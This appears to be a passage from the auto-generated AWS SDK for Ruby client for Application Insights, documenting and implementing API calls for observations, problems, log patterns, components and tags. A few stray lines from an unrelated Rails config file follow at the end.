# @return [Types::DescribeLogPatternResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeLogPatternResponse#resource_group_name #resource_group_name} => String
# * {Types::DescribeLogPatternResponse#log_pattern #log_pattern} => Types::LogPattern
#
# @example Request syntax with placeholder values
#
# resp = client.describe_log_pattern({
# resource_group_name: "ResourceGroupName", # required
# pattern_set_name: "LogPatternSetName", # required
# pattern_name: "LogPatternName", # required
# })
#
# @example Response structure
#
# resp.resource_group_name #=> String
# resp.log_pattern.pattern_set_name #=> String
# resp.log_pattern.pattern_name #=> String
# resp.log_pattern.pattern #=> String
# resp.log_pattern.rank #=> Integer
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/DescribeLogPattern AWS API Documentation
#
# @overload describe_log_pattern(params = {})
# @param [Hash] params ({})
# Builds and dispatches the DescribeLogPattern request in one step.
def describe_log_pattern(params = {}, options = {})
  build_request(:describe_log_pattern, params).send_request(options)
end
# Describes an anomaly or error with the application.
#
# @option params [required, String] :observation_id
# The ID of the observation.
#
# @return [Types::DescribeObservationResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeObservationResponse#observation #observation} => Types::Observation
#
# @example Request syntax with placeholder values
#
# resp = client.describe_observation({
# observation_id: "ObservationId", # required
# })
#
# @example Response structure
#
# resp.observation.id #=> String
# resp.observation.start_time #=> Time
# resp.observation.end_time #=> Time
# resp.observation.source_type #=> String
# resp.observation.source_arn #=> String
# resp.observation.log_group #=> String
# resp.observation.line_time #=> Time
# resp.observation.log_text #=> String
# resp.observation.log_filter #=> String, one of "ERROR", "WARN", "INFO"
# resp.observation.metric_namespace #=> String
# resp.observation.metric_name #=> String
# resp.observation.unit #=> String
# resp.observation.value #=> Float
# resp.observation.cloud_watch_event_id #=> String
# resp.observation.cloud_watch_event_source #=> String, one of "EC2", "CODE_DEPLOY", "HEALTH", "RDS"
# resp.observation.cloud_watch_event_detail_type #=> String
# resp.observation.health_event_arn #=> String
# resp.observation.health_service #=> String
# resp.observation.health_event_type_code #=> String
# resp.observation.health_event_type_category #=> String
# resp.observation.health_event_description #=> String
# resp.observation.code_deploy_deployment_id #=> String
# resp.observation.code_deploy_deployment_group #=> String
# resp.observation.code_deploy_state #=> String
# resp.observation.code_deploy_application #=> String
# resp.observation.code_deploy_instance_group_id #=> String
# resp.observation.ec2_state #=> String
# resp.observation.rds_event_categories #=> String
# resp.observation.rds_event_message #=> String
# resp.observation.s3_event_name #=> String
# resp.observation.states_execution_arn #=> String
# resp.observation.states_arn #=> String
# resp.observation.states_status #=> String
# resp.observation.states_input #=> String
# resp.observation.ebs_event #=> String
# resp.observation.ebs_result #=> String
# resp.observation.ebs_cause #=> String
# resp.observation.ebs_request_id #=> String
# resp.observation.x_ray_fault_percent #=> Integer
# resp.observation.x_ray_throttle_percent #=> Integer
# resp.observation.x_ray_error_percent #=> Integer
# resp.observation.x_ray_request_count #=> Integer
# resp.observation.x_ray_request_average_latency #=> Integer
# resp.observation.x_ray_node_name #=> String
# resp.observation.x_ray_node_type #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/DescribeObservation AWS API Documentation
#
# @overload describe_observation(params = {})
# @param [Hash] params ({})
# Builds and dispatches the DescribeObservation request in one step.
def describe_observation(params = {}, options = {})
  build_request(:describe_observation, params).send_request(options)
end
# Describes an application problem.
#
# @option params [required, String] :problem_id
# The ID of the problem.
#
# @return [Types::DescribeProblemResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeProblemResponse#problem #problem} => Types::Problem
#
# @example Request syntax with placeholder values
#
# resp = client.describe_problem({
# problem_id: "ProblemId", # required
# })
#
# @example Response structure
#
# resp.problem.id #=> String
# resp.problem.title #=> String
# resp.problem.insights #=> String
# resp.problem.status #=> String, one of "IGNORE", "RESOLVED", "PENDING", "RECURRING"
# resp.problem.affected_resource #=> String
# resp.problem.start_time #=> Time
# resp.problem.end_time #=> Time
# resp.problem.severity_level #=> String, one of "Low", "Medium", "High"
# resp.problem.resource_group_name #=> String
# resp.problem.feedback #=> Hash
# resp.problem.feedback["FeedbackKey"] #=> String, one of "NOT_SPECIFIED", "USEFUL", "NOT_USEFUL"
# resp.problem.recurring_count #=> Integer
# resp.problem.last_recurrence_time #=> Time
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/DescribeProblem AWS API Documentation
#
# @overload describe_problem(params = {})
# @param [Hash] params ({})
# Builds and dispatches the DescribeProblem request in one step.
def describe_problem(params = {}, options = {})
  build_request(:describe_problem, params).send_request(options)
end
# Describes the anomalies or errors associated with the problem.
#
# @option params [required, String] :problem_id
# The ID of the problem.
#
# @return [Types::DescribeProblemObservationsResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeProblemObservationsResponse#related_observations #related_observations} => Types::RelatedObservations
#
# @example Request syntax with placeholder values
#
# resp = client.describe_problem_observations({
# problem_id: "ProblemId", # required
# })
#
# @example Response structure
#
# resp.related_observations.observation_list #=> Array
# resp.related_observations.observation_list[0].id #=> String
# resp.related_observations.observation_list[0].start_time #=> Time
# resp.related_observations.observation_list[0].end_time #=> Time
# resp.related_observations.observation_list[0].source_type #=> String
# resp.related_observations.observation_list[0].source_arn #=> String
# resp.related_observations.observation_list[0].log_group #=> String
# resp.related_observations.observation_list[0].line_time #=> Time
# resp.related_observations.observation_list[0].log_text #=> String
# resp.related_observations.observation_list[0].log_filter #=> String, one of "ERROR", "WARN", "INFO"
# resp.related_observations.observation_list[0].metric_namespace #=> String
# resp.related_observations.observation_list[0].metric_name #=> String
# resp.related_observations.observation_list[0].unit #=> String
# resp.related_observations.observation_list[0].value #=> Float
# resp.related_observations.observation_list[0].cloud_watch_event_id #=> String
# resp.related_observations.observation_list[0].cloud_watch_event_source #=> String, one of "EC2", "CODE_DEPLOY", "HEALTH", "RDS"
# resp.related_observations.observation_list[0].cloud_watch_event_detail_type #=> String
# resp.related_observations.observation_list[0].health_event_arn #=> String
# resp.related_observations.observation_list[0].health_service #=> String
# resp.related_observations.observation_list[0].health_event_type_code #=> String
# resp.related_observations.observation_list[0].health_event_type_category #=> String
# resp.related_observations.observation_list[0].health_event_description #=> String
# resp.related_observations.observation_list[0].code_deploy_deployment_id #=> String
# resp.related_observations.observation_list[0].code_deploy_deployment_group #=> String
# resp.related_observations.observation_list[0].code_deploy_state #=> String
# resp.related_observations.observation_list[0].code_deploy_application #=> String
# resp.related_observations.observation_list[0].code_deploy_instance_group_id #=> String
# resp.related_observations.observation_list[0].ec2_state #=> String
# resp.related_observations.observation_list[0].rds_event_categories #=> String
# resp.related_observations.observation_list[0].rds_event_message #=> String
# resp.related_observations.observation_list[0].s3_event_name #=> String
# resp.related_observations.observation_list[0].states_execution_arn #=> String
# resp.related_observations.observation_list[0].states_arn #=> String
# resp.related_observations.observation_list[0].states_status #=> String
# resp.related_observations.observation_list[0].states_input #=> String
# resp.related_observations.observation_list[0].ebs_event #=> String
# resp.related_observations.observation_list[0].ebs_result #=> String
# resp.related_observations.observation_list[0].ebs_cause #=> String
# resp.related_observations.observation_list[0].ebs_request_id #=> String
# resp.related_observations.observation_list[0].x_ray_fault_percent #=> Integer
# resp.related_observations.observation_list[0].x_ray_throttle_percent #=> Integer
# resp.related_observations.observation_list[0].x_ray_error_percent #=> Integer
# resp.related_observations.observation_list[0].x_ray_request_count #=> Integer
# resp.related_observations.observation_list[0].x_ray_request_average_latency #=> Integer
# resp.related_observations.observation_list[0].x_ray_node_name #=> String
# resp.related_observations.observation_list[0].x_ray_node_type #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/DescribeProblemObservations AWS API Documentation
#
# @overload describe_problem_observations(params = {})
# @param [Hash] params ({})
# Builds and dispatches the DescribeProblemObservations request in one step.
def describe_problem_observations(params = {}, options = {})
  build_request(:describe_problem_observations, params).send_request(options)
end
# Lists the IDs of the applications that you are monitoring.
#
# @option params [Integer] :max_results
# The maximum number of results to return in a single call. To retrieve
# the remaining results, make another call with the returned `NextToken`
# value.
#
# @option params [String] :next_token
# The token to request the next page of results.
#
# @return [Types::ListApplicationsResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListApplicationsResponse#application_info_list #application_info_list} => Array<Types::ApplicationInfo>
# * {Types::ListApplicationsResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_applications({
# max_results: 1,
# next_token: "PaginationToken",
# })
#
# @example Response structure
#
# resp.application_info_list #=> Array
# resp.application_info_list[0].resource_group_name #=> String
# resp.application_info_list[0].life_cycle #=> String
# resp.application_info_list[0].ops_item_sns_topic_arn #=> String
# resp.application_info_list[0].ops_center_enabled #=> Boolean
# resp.application_info_list[0].cwe_monitor_enabled #=> Boolean
# resp.application_info_list[0].remarks #=> String
# resp.application_info_list[0].auto_config_enabled #=> Boolean
# resp.application_info_list[0].discovery_type #=> String, one of "RESOURCE_GROUP_BASED", "ACCOUNT_BASED"
# resp.next_token #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/ListApplications AWS API Documentation
#
# @overload list_applications(params = {})
# @param [Hash] params ({})
# Builds and dispatches the ListApplications request in one step.
def list_applications(params = {}, options = {})
  build_request(:list_applications, params).send_request(options)
end
# Lists the auto-grouped, standalone, and custom components of the
# application.
#
# @option params [required, String] :resource_group_name
# The name of the resource group.
#
# @option params [Integer] :max_results
# The maximum number of results to return in a single call. To retrieve
# the remaining results, make another call with the returned `NextToken`
# value.
#
# @option params [String] :next_token
# The token to request the next page of results.
#
# @return [Types::ListComponentsResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListComponentsResponse#application_component_list #application_component_list} => Array<Types::ApplicationComponent>
# * {Types::ListComponentsResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_components({
# resource_group_name: "ResourceGroupName", # required
# max_results: 1,
# next_token: "PaginationToken",
# })
#
# @example Response structure
#
# resp.application_component_list #=> Array
# resp.application_component_list[0].component_name #=> String
# resp.application_component_list[0].component_remarks #=> String
# resp.application_component_list[0].resource_type #=> String
# resp.application_component_list[0].os_type #=> String, one of "WINDOWS", "LINUX"
# resp.application_component_list[0].tier #=> String, one of "CUSTOM", "DEFAULT", "DOT_NET_CORE", "DOT_NET_WORKER", "DOT_NET_WEB_TIER", "DOT_NET_WEB", "SQL_SERVER", "SQL_SERVER_ALWAYSON_AVAILABILITY_GROUP", "MYSQL", "POSTGRESQL", "JAVA_JMX", "ORACLE", "SAP_HANA_MULTI_NODE", "SAP_HANA_SINGLE_NODE", "SAP_HANA_HIGH_AVAILABILITY", "SQL_SERVER_FAILOVER_CLUSTER_INSTANCE", "SHAREPOINT", "ACTIVE_DIRECTORY"
# resp.application_component_list[0].monitor #=> Boolean
# resp.application_component_list[0].detected_workload #=> Hash
# resp.application_component_list[0].detected_workload["Tier"] #=> Hash
# resp.application_component_list[0].detected_workload["Tier"]["MetaDataKey"] #=> String
# resp.next_token #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/ListComponents AWS API Documentation
#
# @overload list_components(params = {})
# @param [Hash] params ({})
# Builds and dispatches the ListComponents request in one step.
def list_components(params = {}, options = {})
  build_request(:list_components, params).send_request(options)
end
# Lists the INFO, WARN, and ERROR events for periodic configuration
# updates performed by Application Insights. Examples of events
# represented are:
#
# * INFO: creating a new alarm or updating an alarm threshold.
#
# * WARN: alarm not created due to insufficient data points used to
# predict thresholds.
#
# * ERROR: alarm not created due to permission errors or exceeding
# quotas.
#
# @option params [String] :resource_group_name
# Resource group to which the application belongs.
#
# @option params [Time,DateTime,Date,Integer,String] :start_time
# The start time of the event.
#
# @option params [Time,DateTime,Date,Integer,String] :end_time
# The end time of the event.
#
# @option params [String] :event_status
# The status of the configuration update event. Possible values include
# INFO, WARN, and ERROR.
#
# @option params [Integer] :max_results
# The maximum number of results returned by `ListConfigurationHistory`
# in paginated output. When this parameter is used,
# `ListConfigurationHistory` returns only `MaxResults` in a single page
# along with a `NextToken` response element. The remaining results of
# the initial request can be seen by sending another
# `ListConfigurationHistory` request with the returned `NextToken`
# value. If this parameter is not used, then `ListConfigurationHistory`
# returns all results.
#
# @option params [String] :next_token
# The `NextToken` value returned from a previous paginated
# `ListConfigurationHistory` request where `MaxResults` was used and the
# results exceeded the value of that parameter. Pagination continues
# from the end of the previous results that returned the `NextToken`
# value. This value is `null` when there are no more results to return.
#
# @return [Types::ListConfigurationHistoryResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListConfigurationHistoryResponse#event_list #event_list} => Array<Types::ConfigurationEvent>
# * {Types::ListConfigurationHistoryResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_configuration_history({
# resource_group_name: "ResourceGroupName",
# start_time: Time.now,
# end_time: Time.now,
# event_status: "INFO", # accepts INFO, WARN, ERROR
# max_results: 1,
# next_token: "PaginationToken",
# })
#
# @example Response structure
#
# resp.event_list #=> Array
# resp.event_list[0].monitored_resource_arn #=> String
# resp.event_list[0].event_status #=> String, one of "INFO", "WARN", "ERROR"
# resp.event_list[0].event_resource_type #=> String, one of "CLOUDWATCH_ALARM", "CLOUDWATCH_LOG", "CLOUDFORMATION", "SSM_ASSOCIATION"
# resp.event_list[0].event_time #=> Time
# resp.event_list[0].event_detail #=> String
# resp.event_list[0].event_resource_name #=> String
# resp.next_token #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/ListConfigurationHistory AWS API Documentation
#
# @overload list_configuration_history(params = {})
# @param [Hash] params ({})
# Builds and dispatches the ListConfigurationHistory request in one step.
def list_configuration_history(params = {}, options = {})
  build_request(:list_configuration_history, params).send_request(options)
end
# Lists the log pattern sets in the specific application.
#
# @option params [required, String] :resource_group_name
# The name of the resource group.
#
# @option params [Integer] :max_results
# The maximum number of results to return in a single call. To retrieve
# the remaining results, make another call with the returned `NextToken`
# value.
#
# @option params [String] :next_token
# The token to request the next page of results.
#
# @return [Types::ListLogPatternSetsResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListLogPatternSetsResponse#resource_group_name #resource_group_name} => String
# * {Types::ListLogPatternSetsResponse#log_pattern_sets #log_pattern_sets} => Array<String>
# * {Types::ListLogPatternSetsResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_log_pattern_sets({
# resource_group_name: "ResourceGroupName", # required
# max_results: 1,
# next_token: "PaginationToken",
# })
#
# @example Response structure
#
# resp.resource_group_name #=> String
# resp.log_pattern_sets #=> Array
# resp.log_pattern_sets[0] #=> String
# resp.next_token #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/ListLogPatternSets AWS API Documentation
#
# @overload list_log_pattern_sets(params = {})
# @param [Hash] params ({})
# Builds and dispatches the ListLogPatternSets request in one step.
def list_log_pattern_sets(params = {}, options = {})
  build_request(:list_log_pattern_sets, params).send_request(options)
end
# Lists the log patterns in the specific log `LogPatternSet`.
#
# @option params [required, String] :resource_group_name
# The name of the resource group.
#
# @option params [String] :pattern_set_name
# The name of the log pattern set.
#
# @option params [Integer] :max_results
# The maximum number of results to return in a single call. To retrieve
# the remaining results, make another call with the returned `NextToken`
# value.
#
# @option params [String] :next_token
# The token to request the next page of results.
#
# @return [Types::ListLogPatternsResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListLogPatternsResponse#resource_group_name #resource_group_name} => String
# * {Types::ListLogPatternsResponse#log_patterns #log_patterns} => Array<Types::LogPattern>
# * {Types::ListLogPatternsResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_log_patterns({
# resource_group_name: "ResourceGroupName", # required
# pattern_set_name: "LogPatternSetName",
# max_results: 1,
# next_token: "PaginationToken",
# })
#
# @example Response structure
#
# resp.resource_group_name #=> String
# resp.log_patterns #=> Array
# resp.log_patterns[0].pattern_set_name #=> String
# resp.log_patterns[0].pattern_name #=> String
# resp.log_patterns[0].pattern #=> String
# resp.log_patterns[0].rank #=> Integer
# resp.next_token #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/ListLogPatterns AWS API Documentation
#
# @overload list_log_patterns(params = {})
# @param [Hash] params ({})
# Builds and dispatches the ListLogPatterns request in one step.
def list_log_patterns(params = {}, options = {})
  build_request(:list_log_patterns, params).send_request(options)
end
# Lists the problems with your application.
#
# @option params [String] :resource_group_name
# The name of the resource group.
#
# @option params [Time,DateTime,Date,Integer,String] :start_time
# The time when the problem was detected, in epoch seconds. If you
# don't specify a time frame for the request, problems within the past
# seven days are returned.
#
# @option params [Time,DateTime,Date,Integer,String] :end_time
# The time when the problem ended, in epoch seconds. If not specified,
# problems within the past seven days are returned.
#
# @option params [Integer] :max_results
# The maximum number of results to return in a single call. To retrieve
# the remaining results, make another call with the returned `NextToken`
# value.
#
# @option params [String] :next_token
# The token to request the next page of results.
#
# @option params [String] :component_name
#   The name of the component.
#
# @return [Types::ListProblemsResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListProblemsResponse#problem_list #problem_list} => Array<Types::Problem>
# * {Types::ListProblemsResponse#next_token #next_token} => String
# * {Types::ListProblemsResponse#resource_group_name #resource_group_name} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_problems({
# resource_group_name: "ResourceGroupName",
# start_time: Time.now,
# end_time: Time.now,
# max_results: 1,
# next_token: "PaginationToken",
# component_name: "ComponentName",
# })
#
# @example Response structure
#
# resp.problem_list #=> Array
# resp.problem_list[0].id #=> String
# resp.problem_list[0].title #=> String
# resp.problem_list[0].insights #=> String
# resp.problem_list[0].status #=> String, one of "IGNORE", "RESOLVED", "PENDING", "RECURRING"
# resp.problem_list[0].affected_resource #=> String
# resp.problem_list[0].start_time #=> Time
# resp.problem_list[0].end_time #=> Time
# resp.problem_list[0].severity_level #=> String, one of "Low", "Medium", "High"
# resp.problem_list[0].resource_group_name #=> String
# resp.problem_list[0].feedback #=> Hash
# resp.problem_list[0].feedback["FeedbackKey"] #=> String, one of "NOT_SPECIFIED", "USEFUL", "NOT_USEFUL"
# resp.problem_list[0].recurring_count #=> Integer
# resp.problem_list[0].last_recurrence_time #=> Time
# resp.next_token #=> String
# resp.resource_group_name #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/ListProblems AWS API Documentation
#
# @overload list_problems(params = {})
# @param [Hash] params ({})
# Builds and dispatches the ListProblems request in one step.
def list_problems(params = {}, options = {})
  build_request(:list_problems, params).send_request(options)
end
# Retrieve a list of the tags (keys and values) that are associated with
# a specified application. A *tag* is a label that you optionally define
# and associate with an application. Each tag consists of a required
# *tag key* and an optional associated *tag value*. A tag key is a
# general label that acts as a category for more specific tag values. A
# tag value acts as a descriptor within a tag key.
#
# @option params [required, String] :resource_arn
# The Amazon Resource Name (ARN) of the application that you want to
# retrieve tag information for.
#
# @return [Types::ListTagsForResourceResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListTagsForResourceResponse#tags #tags} => Array<Types::Tag>
#
# @example Request syntax with placeholder values
#
# resp = client.list_tags_for_resource({
# resource_arn: "AmazonResourceName", # required
# })
#
# @example Response structure
#
# resp.tags #=> Array
# resp.tags[0].key #=> String
# resp.tags[0].value #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/ListTagsForResource AWS API Documentation
#
# @overload list_tags_for_resource(params = {})
# @param [Hash] params ({})
def list_tags_for_resource(params = {}, options = {})
req = build_request(:list_tags_for_resource, params)
req.send_request(options)
end
# Add one or more tags (keys and values) to a specified application. A
# *tag* is a label that you optionally define and associate with an
# application. Tags can help you categorize and manage application in
# different ways, such as by purpose, owner, environment, or other
# criteria.
#
# Each tag consists of a required *tag key* and an associated *tag
# value*, both of which you define. A tag key is a general label that
# acts as a category for more specific tag values. A tag value acts as a
# descriptor within a tag key.
#
# @option params [required, String] :resource_arn
# The Amazon Resource Name (ARN) of the application that you want to add
# one or more tags to.
#
# @option params [required, Array<Types::Tag>] :tags
# A list of tags that to add to the application. A tag consists of a
# required tag key (`Key`) and an associated tag value (`Value`). The
# maximum length of a tag key is 128 characters. The maximum length of a
# tag value is 256 characters.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.tag_resource({
# resource_arn: "AmazonResourceName", # required
# tags: [ # required
# {
# key: "TagKey", # required
# value: "TagValue", # required
# },
# ],
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/TagResource AWS API Documentation
#
# @overload tag_resource(params = {})
# @param [Hash] params ({})
def tag_resource(params = {}, options = {})
req = build_request(:tag_resource, params)
req.send_request(options)
end
# Remove one or more tags (keys and values) from a specified
# application.
#
# @option params [required, String] :resource_arn
# The Amazon Resource Name (ARN) of the application that you want to
# remove one or more tags from.
#
# @option params [required, Array<String>] :tag_keys
# The tags (tag keys) that you want to remove from the resource. When
# you specify a tag key, the action removes both that key and its
# associated tag value.
#
# To remove more than one tag from the application, append the `TagKeys`
# parameter and argument for each additional tag to remove, separated by
# an ampersand.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.untag_resource({
# resource_arn: "AmazonResourceName", # required
# tag_keys: ["TagKey"], # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/UntagResource AWS API Documentation
#
# @overload untag_resource(params = {})
# @param [Hash] params ({})
def untag_resource(params = {}, options = {})
req = build_request(:untag_resource, params)
req.send_request(options)
end
# Updates the application.
#
# @option params [required, String] :resource_group_name
# The name of the resource group.
#
# @option params [Boolean] :ops_center_enabled
# When set to `true`, creates opsItems for any problems detected on an
# application.
#
# @option params [Boolean] :cwe_monitor_enabled
# Indicates whether Application Insights can listen to CloudWatch events
# for the application resources, such as `instance terminated`, `failed
# deployment`, and others.
#
# @option params [String] :ops_item_sns_topic_arn
# The SNS topic provided to Application Insights that is associated to
# the created opsItem. Allows you to receive notifications for updates
# to the opsItem.
#
# @option params [Boolean] :remove_sns_topic
# Disassociates the SNS topic from the opsItem created for detected
# problems.
#
# @option params [Boolean] :auto_config_enabled
#
# @return [Types::UpdateApplicationResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::UpdateApplicationResponse#application_info #application_info} => Types::ApplicationInfo
#
# @example Request syntax with placeholder values
#
# resp = client.update_application({
# resource_group_name: "ResourceGroupName", # required
# ops_center_enabled: false,
# cwe_monitor_enabled: false,
# ops_item_sns_topic_arn: "OpsItemSNSTopicArn",
# remove_sns_topic: false,
# auto_config_enabled: false,
# })
#
# @example Response structure
#
# resp.application_info.resource_group_name #=> String
# resp.application_info.life_cycle #=> String
# resp.application_info.ops_item_sns_topic_arn #=> String
# resp.application_info.ops_center_enabled #=> Boolean
# resp.application_info.cwe_monitor_enabled #=> Boolean
# resp.application_info.remarks #=> String
# resp.application_info.auto_config_enabled #=> Boolean
# resp.application_info.discovery_type #=> String, one of "RESOURCE_GROUP_BASED", "ACCOUNT_BASED"
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/UpdateApplication AWS API Documentation
#
# @overload update_application(params = {})
# @param [Hash] params ({})
def update_application(params = {}, options = {})
req = build_request(:update_application, params)
req.send_request(options)
end
# Updates the custom component name and/or the list of resources that
# make up the component.
#
# @option params [required, String] :resource_group_name
# The name of the resource group.
#
# @option params [required, String] :component_name
# The name of the component.
#
# @option params [String] :new_component_name
# The new name of the component.
#
# @option params [Array<String>] :resource_list
# The list of resource ARNs that belong to the component.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.update_component({
# resource_group_name: "ResourceGroupName", # required
# component_name: "CustomComponentName", # required
# new_component_name: "CustomComponentName",
# resource_list: ["ResourceARN"],
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/UpdateComponent AWS API Documentation
#
# @overload update_component(params = {})
# @param [Hash] params ({})
def update_component(params = {}, options = {})
req = build_request(:update_component, params)
req.send_request(options)
end
# Updates the monitoring configurations for the component. The
# configuration input parameter is an escaped JSON of the configuration
# and should match the schema of what is returned by
# `DescribeComponentConfigurationRecommendation`.
#
# @option params [required, String] :resource_group_name
# The name of the resource group.
#
# @option params [required, String] :component_name
# The name of the component.
#
# @option params [Boolean] :monitor
# Indicates whether the application component is monitored.
#
# @option params [String] :tier
# The tier of the application component. Supported tiers include
# `DOT_NET_WORKER`, `DOT_NET_WEB`, `DOT_NET_CORE`, `SQL_SERVER`, and
# `DEFAULT`.
#
# @option params [String] :component_configuration
# The configuration settings of the component. The value is the escaped
# JSON of the configuration. For more information about the JSON format,
# see [Working with JSON][1]. You can send a request to
# `DescribeComponentConfigurationRecommendation` to see the recommended
# configuration for a component. For the complete format of the
# component configuration file, see [Component Configuration][2].
#
#
#
# [1]: https://docs.aws.amazon.com/sdk-for-javascript/v2/developer-guide/working-with-json.html
# [2]: https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/component-config.html
#
# @option params [Boolean] :auto_config_enabled
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.update_component_configuration({
# resource_group_name: "ResourceGroupName", # required
# component_name: "ComponentName", # required
# monitor: false,
# tier: "CUSTOM", # accepts CUSTOM, DEFAULT, DOT_NET_CORE, DOT_NET_WORKER, DOT_NET_WEB_TIER, DOT_NET_WEB, SQL_SERVER, SQL_SERVER_ALWAYSON_AVAILABILITY_GROUP, MYSQL, POSTGRESQL, JAVA_JMX, ORACLE, SAP_HANA_MULTI_NODE, SAP_HANA_SINGLE_NODE, SAP_HANA_HIGH_AVAILABILITY, SQL_SERVER_FAILOVER_CLUSTER_INSTANCE, SHAREPOINT, ACTIVE_DIRECTORY
# component_configuration: "ComponentConfiguration",
# auto_config_enabled: false,
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/UpdateComponentConfiguration AWS API Documentation
#
# @overload update_component_configuration(params = {})
# @param [Hash] params ({})
def update_component_configuration(params = {}, options = {})
req = build_request(:update_component_configuration, params)
req.send_request(options)
end
# Adds a log pattern to a `LogPatternSet`.
#
# @option params [required, String] :resource_group_name
# The name of the resource group.
#
# @option params [required, String] :pattern_set_name
# The name of the log pattern set.
#
# @option params [required, String] :pattern_name
# The name of the log pattern.
#
# @option params [String] :pattern
# The log pattern. The pattern must be DFA compatible. Patterns that
# utilize forward lookahead or backreference constructions are not
# supported.
#
# @option params [Integer] :rank
# Rank of the log pattern. Must be a value between `1` and `1,000,000`.
# The patterns are sorted by rank, so we recommend that you set your
# highest priority patterns with the lowest rank. A pattern of rank `1`
# will be the first to get matched to a log line. A pattern of rank
# `1,000,000` will be last to get matched. When you configure custom log
# patterns from the console, a `Low` severity pattern translates to a
# `750,000` rank. A `Medium` severity pattern translates to a `500,000`
# rank. And a `High` severity pattern translates to a `250,000` rank.
# Rank values less than `1` or greater than `1,000,000` are reserved for
# AWS-provided patterns.
#
# @return [Types::UpdateLogPatternResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::UpdateLogPatternResponse#resource_group_name #resource_group_name} => String
# * {Types::UpdateLogPatternResponse#log_pattern #log_pattern} => Types::LogPattern
#
# @example Request syntax with placeholder values
#
# resp = client.update_log_pattern({
# resource_group_name: "ResourceGroupName", # required
# pattern_set_name: "LogPatternSetName", # required
# pattern_name: "LogPatternName", # required
# pattern: "LogPatternRegex",
# rank: 1,
# })
#
# @example Response structure
#
# resp.resource_group_name #=> String
# resp.log_pattern.pattern_set_name #=> String
# resp.log_pattern.pattern_name #=> String
# resp.log_pattern.pattern #=> String
# resp.log_pattern.rank #=> Integer
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/UpdateLogPattern AWS API Documentation
#
# @overload update_log_pattern(params = {})
# @param [Hash] params ({})
def update_log_pattern(params = {}, options = {})
req = build_request(:update_log_pattern, params)
req.send_request(options)
end
# @!endgroup
# @param params ({})
# @api private
def build_request(operation_name, params = {})
handlers = @handlers.for(operation_name)
context = Seahorse::Client::RequestContext.new(
operation_name: operation_name,
operation: config.api.operation(operation_name),
client: self,
params: params,
config: config)
context[:gem_name] = 'aws-sdk-applicationinsights'
context[:gem_version] = '1.30.0'
Seahorse::Client::Request.new(handlers, context)
end
# @api private
# @deprecated
def waiter_names
[]
end
class << self
# @api private
attr_reader :identifier
# @api private
def errors_module
Errors
end
end
end
end
| 45.726789 | 407 | 0.68063 |
1cf7e19e1868754d4611abb040fe0e4f0b10ba9d | 839 | # Be sure to restart your server when you modify this file.
# Version of your assets, change this if you want to expire all your assets.
